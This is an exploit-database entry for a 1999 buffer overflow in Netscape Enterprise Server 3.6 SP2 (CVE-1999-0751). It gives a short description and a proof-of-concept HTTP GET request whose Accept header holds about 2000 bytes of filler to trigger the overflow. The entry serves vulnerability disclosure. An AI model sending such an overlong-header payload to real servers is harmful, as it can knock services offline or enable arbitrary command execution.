Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow Vulnerability

1999-09-13T00:00:00
ID EDB-ID:19493
Type exploitdb
Reporter Nobuo Miwa
Modified 1999-09-13T00:00:00

Description

Netscape Enterprise Server 3.51/3.6 SP2 Accept Buffer Overflow Vulnerability. CVE-1999-0751. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/631/info

Enterprise Server 3.6 SP2 with the SSL Handshake Patch applied is vulnerable to a buffer overflow that may allow attackers to launch denial-of-service attacks and to execute arbitrary commands on the webserver. 

GET / HTTP/1.0
Accept: aaaaaaaaaaaaaa...2000byte/gif